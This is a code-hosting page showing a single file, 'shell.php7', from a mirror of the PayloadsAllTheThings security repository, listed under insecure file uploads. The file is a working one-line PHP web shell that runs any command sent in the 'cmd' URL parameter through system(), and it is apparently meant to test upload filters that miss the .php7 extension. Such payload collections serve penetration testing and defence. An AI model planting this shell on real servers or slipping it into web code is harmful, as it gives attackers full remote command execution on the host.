1
0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-08-21 05:54:36 +02:00
PayloadsAllTheThings/Upload Insecure Files/Extension PHP/shell.php7

1 line
43 B
Plaintext

<?php echo "Shell";system($_GET['cmd']); ?>